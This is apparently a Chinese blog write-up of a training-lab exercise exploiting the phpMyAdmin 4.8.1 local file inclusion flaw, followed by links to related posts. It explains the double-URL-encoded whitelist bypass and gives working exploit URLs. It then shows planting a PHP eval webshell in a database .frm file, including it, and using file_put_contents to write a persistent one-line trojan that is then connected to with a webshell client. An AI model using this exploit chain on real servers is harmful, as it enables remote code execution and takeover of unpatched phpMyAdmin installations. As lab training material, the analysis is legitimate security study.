[zkaq靶场]文件包含--(phpMyAdmin-4.8.1 )

最新推荐文章于 2024-08-15 10:48:44 发布
最新推荐文章于 2024-08-15 10:48:44 发布
阅读量335 收藏
点赞数 1
分类专栏: zkaq靶场 文章标签: 文件包含 php phpmyadmin 代码审计 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116605574
版权

文件包含

本地文件包含:LFI

远程文件包含:RFI(需要开启配置选项:allow_url_include=On)

靶场(phpMyAdmin-4.8.1 )

本地测试

审计

全局搜索include,发现一些可疑之处:

image-20210508160925538

具体代码是这一块:

image-20210508161303784

需要执行到include需要满足这个if条件。

我们可以来分析一下这个条件:

(! empty($_REQUEST['target'])//条件1
 is_string($_REQUEST['target'])//条件2
 ! preg_match('/^index/', $_REQUEST['target'])//条件3
 ! in_array($_REQUEST['target'], $target_blacklist)//条件4
 Core::checkPageValidity($_REQUEST['target'])//条件5

条件1:target传参不为空

条件2:target传参为字符串

条件3:target传参不是index开头

条件4:target传参不在$target_blacklist中,即target传参不在黑名单中。

条件5:target传参传入了checkPagevalidity()中。

定位到Core::checkPageValidity()

image-20210508163133084

需要这个方法返回true,有三个地方。

第一处需要 p a g e 也 就 是 t a r g e t 传 参 , 在 白 名 单 里 , 白 名 单 默 认 传 的 是 空 就 等 于 page也就是target传参,在白名单里,白名单默认传的是空就等于 pagetargetgoto_whitelist

来看第二个会true的地方,这里已经执行一段代码:

$_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );

mb_substr():截取字符串,可以截取中文

mb_substr(字符串,开始位置,长度)

mb_strpos():查找字符串在另一个字符串中首次出现的位置

mb_strpos($page . '?', '?')的意思就是查找问号的位置

这一整段的意思就是:截取$page字符串,直到问号(不包括问号)。

第三个返回true的地方先进行了一次url解码,之后还是需要在白名单里。

条件5的意思就是target传参问号之前的字符串需要在白名单中。

漏洞点:

前言知识点:

<?php
include("hjkfaf/../phpinfo.php");
?>

这段代码是没问题的,这样相对路径包含是可以的。hjkaf是不存在的文件夹,

但是不能存在问号(例如hjfkaksfa?fdfjsfh/…/phpinfo.php),因为问号在php中是用来传参的,如果include遇到问号就认为后面不再是路径,随即报错。我们不能让include的路径中出现问号。

但是在条件5最后返回true的这个地方,它进行了一次url解码。

问号?的url编码是%3F,再将%3F进行一次url编码变成%253F。最后构造成能绕过白名单检测的传参。

白名单:随便选一个就好。

image-20210508165638137

那么我们就懂了五个条件,接下来就可以构造满足条件的传参。

POC:
target=db_sql.php%253Fqqqqq/../

首先%253F被传入会自动进行一次url解码变成%3F,然后条件5再进行一次url解码变成?,即变成db_sql.php?qqqqq,这样是可以通过五个条件的。通过条件之后就是:

include db_sql.php%253Fqqqq/../

这样就能通过相对路径利用。

测试一下:

在phpMyAdmin-4.8.1的index.php同目录下放一个666.php,内容是phpinfo()。

可以利用:

http://192.168.17.144/phpMyAdmin2/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253F/…/666.php

image-20210508181544671

靶场

登录其phpmyadmin后台,找到其MySQL的目录:

C:/phpStudy/MySQL/

image-20210508182437346

我们知道,在phpstudy中数据库中的库会被存放在MySQL/data目录下:

image-20210508182707721

这些文件夹都是已经存在的库。

表就是库文件夹下的frm文件:

frm文件中包含字段信息。

image-20210508183039186

image-20210508183130328

为了向服务器中写入木马,我们可以这样做。

新建一个库xxx,xxx库中新建一个表yyy,yyy中有一个字段是<?php eval($_REQUEST[6])?>

然后我们再去包含这个文件。

image-20210508183942800

包含试试:

http://192.168.17.144/phpMyAdmin2/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253F/…/…/…/…/MySQL/data/xxx/yyy.frm&6=phpinfo();

成功包含:

image-20210508184438435

但是这样不能菜刀连接。

然后利用这个写入木马:

http://192.168.17.144/phpMyAdmin2/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253F/…/…/…/…/MySQL/data/xxx/yyy.frm&6=file_put_contents(“777.php”,"<?php eval($_REQUEST[777])?>");

image-20210508185502238

回到靶场

然后回到靶场这边,登录进其后台之后,建库,建表,写入木马。

C:/phpStudy/MySQL/

image-20210508191056261

写入一句话:

index.php?target=db_sql.php%253F/../../../../MySQL/data/xxx/yyy.frm&6=file_put_contents("777.php","<?php eval($_REQUEST[8])?>");

连接菜刀,找到flag:
image-20210508192005027

wwxxee
关注
专栏目录
[zkaq靶场]XSS--存储型XSS
wwxxee
05-09 457
存储型XSS 靶场 靶场cms是Fine CMS,其版本为v5.3.0。 搜索该cms的漏洞。 参考:https://www.jianshu.com/p/200ea62486d9 简单来说就是,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。 当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发xs
文件包含靶场
2301_77425356的博客
05-08 169
我们看下这个目录,因为他是linux肯定有的目录,我们记住他反馈的位置,后面就可以知道反馈在哪里了。我们用WindTerm连接,在用户上插入我们的马(打印是为了看自己的PHP语句是否成功执行)这里也可以用wfuzz跑出来参数,我们找到了image是参数,找到参数了,我们进行下一步。扫描出各个的端口的服务,看下那个日志可以看,我用的是2211,2211端口开的是xss。同时用nmap进行端口扫描,发现了8888,80和2211端口。我们是查下xss的日志在那个目录下,然后查看后成功包含出数据。
CISP-PTE CMS phpmyadmin靶场训练
最新发布
sudamasami的博客
08-15 356
cms靶场训练
iwebsec靶场文件包含
果粒程
03-02 1322
iwebsec靶场文件包含
文件包含漏洞--pikachu靶场
嘿嘿嘿
05-19 906
2.include "include/$filename"---这是23行的内容也是漏洞的成因,因为将用户的get请求中的参数直接无条件的放入include语句去执行。通过下拉菜单选择球星实际是发送不同的get请求回显对应内容,文件包含漏洞的关键是文件包含函数(include/require)身份对参数有严格定义,因此我们是要找到能调用文件包含php文件。文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。:在包含文件时,如果找不到包含的文件,它只会产生告警,页面的。
phpMyAdmin-CMS靶场
网安小白
08-03 430
和第一个一样,写入一句话木马,用蚁剑连接。设置日志文件目录,创建php日志文件。最右边有个执行按钮,可以执行。可以写入一句话木马用蚁剑连接。查看自己创建的日志文件。
phpMyAdmin-4.8.1-all-languages
05-26
phpMyAdmin-4.8.1-all-languages:助力H5小游戏开发的数据库管理工具》 在IT行业中,数据库管理是至关重要的环节,尤其是在开发H5小游戏时,数据存储和查询的效率直接影响到游戏的运行性能和用户体验。phpMyAdmin...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
bitnami-docker-phpmyadmin:用于phpMyAdmin的Bitnami Docker映像
04-19
什么是phpMyAdminphpMyAdmin是一个用PHP编写的免费软件工具,旨在处理Web上MySQL管理。 phpMyAdmin在MySQL和MariaDB上支持多种操作。 可以通过用户界面执行常用操作(管理数据库,表,列,关系,索引,用户,...
MSSQL-反弹注入(zkaq靶场)
v2ish1yan的博客
04-29 3453
MSSQL就是sql server 他跟mysql进行注入的方式有所不同 这里写两种方法 1.联合查询注入 首先mssql使用联合查询时,是不能用select 1,2,3这样填充的,必须要和表中的数据类型一样,但是可以使用null来填充 首先来猜字段 order by 3时正确,order by 4时错误 所以字段数为3 然后进行猜数据类型。先 ?id=1’ union all select NULL,NULL,NULL – qwe 回显正常 挨个测试数据类型 ?id=1’ union all sele
DAY15:文件包含漏洞靶场手册(自用 file-include 靶场
qq_49433473的博客
07-27 771
include自搭靶场手册,bug多 伪协议使用,后缀名绕过,路径拼接绕过。。。。
webug4.0靶场文件包含
0nc3的博客
06-26 882
0x00 文件包含靶场测试 包括: 本地文件包含 session文件包含漏洞 远程文件包含 利用PHP伪协议 靶场首页 下面开始今天的测试~~ 0x01 本地文件包含 通过目录遍历包含本地文件 成功包含PHPStudy的Mysql配置文件 读取文件上传关上传的可执行文件。 看了一下源码,无任何限制 那我们多测几个~~ 0x02 session文件包含漏洞 当session的存储位置可以获...
DNS-log注入(zkaq靶场
v2ish1yan的博客
04-21 1357
DNS-log注入
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1529
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
[zkaq靶场]XSS--DOM型XSS
wwxxee
05-09 532
DOM型xss 知识点 DOM(document object model)文档对象模型 一个网页是由dom树构建而成,而js可以修改页面元素,也就是可以修改dom树中的节点。客户端可以通过js动态修改页面内容从而进行xss攻击。 dom型xss常见函数: document.write():写入网页内容(可以接受native编码) innerHTML:修改节点内容 eval:将字符串当作代码执行 靶场 首页:是一个聊天室 查看页面代码发现此处使用了document.write()。 而页面的url跟文本
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 5339
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
[zkaq靶场]SQL注入--access数据库-偏移注入
wwxxee
05-09 440
Access注入–偏移注入 适用场景: 当使用select * from admin与select admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。 union select 1,2,3,admin.* ,4,5,6 from admin 通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。 靶场 该处的sql注入为access数据库-cookie注入的漏洞点。 偏移注入的漏洞点在: 由于admin表里新增了一个字段,无法通过爆破得出,所以在此处
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值